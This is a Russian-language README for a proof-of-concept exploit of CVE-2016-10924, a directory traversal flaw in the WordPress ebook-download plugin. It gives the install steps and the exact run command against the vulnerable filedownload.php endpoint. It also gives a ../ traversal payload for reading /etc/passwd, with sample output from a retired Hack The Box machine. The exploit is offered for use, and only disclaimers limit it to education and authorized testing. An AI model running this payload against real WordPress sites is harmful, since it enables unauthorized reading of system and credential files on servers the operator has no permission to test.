
Скрипт эксплуатации Proof-of-Concept (PoC) для уязвимости Directory Traversal (CVE-2016-10924), обнаруженной в плагине WordPress ebook-download (версии < 1.2). Эта уязвимость позволяет несанкционированное чтение файлов через специально сформированный GET-запрос.
Этот репозиторий содержит эксплойт-скрипт Proof-of-Concept (PoC) для уязвимости Directory Traversal (CVE-2016-10924), обнаруженной в плагине WordPress ebook-download (версии < 1.2).
Эта уязвимость позволяет несанкционированное чтение файлов через специально сформированный GET-запрос. Эксплойт использует параметр ebookdownloadurl для обхода каталогов на целевом сервере.
ebook-download версии < 1.2 для WordPress/etc/passwd, изменяя путь к файлу в параметре ebookdownloadurl.Примечание: Этот PoC предназначен только для образовательного и авторизованного тестирования. Неправильное использование этой информации может привести к юридическим последствиям.
requests (установка через pip install requests)Клонируйте репозиторий:
git clone https://github.com/your-user/CVE-2016-10924-POC.git
cd CVE-2016-10924-POC
Установите зависимости:
pip install requests
Запустите эксплойт:
python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
Укажите путь к файлу для чтения: После запуска скрипта вам будет предложено ввести путь к файлу. Например:
../../../../../../../../../etc/passwd
Возможно, потребуется изменить количество ../ в зависимости от расположения корневой веб-директории в целевой среде.
Выход:
exit, quit или нажмите Enter на пустом поле для выхода.Я использовал этот эксплойт на машине "Backdoor" из Hack The Box (выведена из эксплуатации):
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Введите пути к файлам (например, ../../../../../etc/passwd). Введите 'exit' для выхода.
Enter File path: ../../../../../../../../../etc/passwd
[*] Целевой URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Код состояния: 200
[+] Содержимое файла:
root:x:0:0:root:/root:/bin/bash
...
Этот проект предназначен исключительно для образовательных и легитимных тестов безопасности.
Не используйте информацию или скрипты из этого репозитория в системах, на которые у вас нет явного разрешения для тестирования.
Автор и соавторы не несут ответственности за любое неправильное использование или ущерб, причиненный этим инструментом.
Этот проект лицензирован в соответствии с GNU 2.0 License. Можете использовать и изменять его, но, пожалуйста, указывайте авторство.
Ссылки